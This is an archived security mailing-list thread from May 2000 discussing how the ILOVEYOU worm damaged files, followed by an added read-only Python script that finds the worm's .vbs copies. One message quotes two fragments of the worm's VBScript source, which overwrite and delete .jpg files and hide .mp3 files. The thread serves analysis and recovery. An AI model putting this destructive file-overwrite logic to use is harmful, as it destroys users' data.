Vulnerability Development mailing list archives

Re: I love you Author evidence ?


From: sachsm () JTFCND IA MIL (Sachs, Marcus)
Date: Wed, 10 May 2000 08:46:16 -0400


If the script executed properly, the .jpg's were replaced by a copy of the
script and the originals deleted:

elseif(ext="jpg") or (ext="jpeg") then
      set ap=fso.OpenTextFile(f1.path,2,true)
      ap.write vbscopy
      ap.close
      set cop=fso.GetFile(f1.path)
      cop.copy(f1.path&".vbs")
      fso.DeleteFile(f1.path)

Only the .mp2's and .mp3's were hidden (attribute "2"):

elseif(ext="mp3") or (ext="mp2") then
      set mp3=fso.CreateTextFile(f1.path&".vbs")
      mp3.write vbscopy
      mp3.close
      set att=fso.GetFile(f1.path)
      att.attributes=att.attributes+2

ms

-----Original Message-----
From: Harmer, Mike [mailto:MHarmer () MVG COM]
Sent: Tuesday, May 09, 2000 2:29 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: I love you Author evidence ?

This is not true. It replaces the .jpg files with itself, sometimes. There
is some kind of bug at work, but it does not hide them.

Michael E. Harmer
Miller-Valentine Group
4000 Miller-Valentine Ct.
Dayton, OH 45439-1487
x804
mharmer () mvg com

----------------------------------------------
In the middle of difficulty lies opportunity.
--Albert Einstein
----------------------------------------------

-----Original Message-----
From: White Vampire [mailto:whitevampire () MINDLESS COM]
Sent: Monday, May 08, 2000 1:26 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: I love you Author evidence ?

On Sun, May 07, 2000 at 10:16:26PM -0500, Christofer C.
Bell(cbell () JAYHAWKS NET) wrote:
: I just wanted to point out that not all the losses are in terms of
: shutdown email.  I know of several of that had their business' webservers
: impacted because Windows clients had the machines mounted via SMB
: filesharing (the web development group specifically) and the "worm"
: deleted the site's .jpg files.

        From what I read somewhere, the .JPG (et cetera) files are only
marked 'hidden' and are easily recoverable.

: This is just some additional insight on how the figure of $100M may have
: been reached.

        I find this and most alleged 'damage figures' to be extreme.

Regards,

--
    __      ______   ____
   /  \    /  \   \ /   / White Vampire\Rem
   \   \/\/   /\   Y   /  http://www.projectgamma.com/
    \        /  \     /   http://www.webfringe.com/
     \__/\  /    \___/    http://www.gammaforce.org/
          \/ "Silly hacker, root is for administrators."
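
Added example, not part of the original thread or of the script quoted in it: a read-only triage pass over a directory tree (for instance a mounted web share) that finds the "<name>.<ext>.vbs" copies left by the two branches quoted above and reports what happened to each original. The status strings and function names are assumptions made for this illustration.

```python
import os
import sys

# Outcomes follow the two script branches quoted in the thread.
OVERWRITTEN = {".jpg", ".jpeg"}  # content replaced by the script, original then deleted
HIDDEN = {".mp3", ".mp2"}        # original left in place, attribute 2 (hidden) added
FILE_ATTRIBUTE_HIDDEN = 0x2      # Windows attribute bit, the "2" in the thread

def is_jpeg(path):
    """True if the file still starts with the JPEG SOI marker (FF D8)."""
    with open(path, "rb") as fh:
        return fh.read(2) == b"\xff\xd8"

def is_hidden(path):
    """Windows hidden bit; False on platforms without st_file_attributes."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    return bool(attrs & FILE_ATTRIBUTE_HIDDEN)

def triage(root):
    """Map each '<name>.<ext>.vbs' script copy under root to the fate of its original."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        by_lower = {f.lower(): f for f in files}
        for name in files:
            stem, last = os.path.splitext(name)
            ext = os.path.splitext(stem)[1].lower()
            if last.lower() != ".vbs" or ext not in OVERWRITTEN | HIDDEN:
                continue
            original = by_lower.get(stem.lower())
            path = os.path.join(dirpath, original) if original else None
            if path is None:
                # Expected for .jpg/.jpeg: DeleteFile ran, so restore from backup.
                status = "original-missing"
            elif ext in HIDDEN:
                status = "recoverable-hidden" if is_hidden(path) else "recoverable"
            else:
                # Original name survived: check whether it still holds image data.
                status = "original-intact" if is_jpeg(path) else "original-overwritten"
            findings[os.path.join(dirpath, name)] = status
    return findings

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for script_copy, status in sorted(triage(target).items()):
        print(f"{status:22} {script_copy}")
```

The scan only reads; removing the .vbs copies and clearing the hidden attribute on the .mp2/.mp3 originals is left to the operator.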


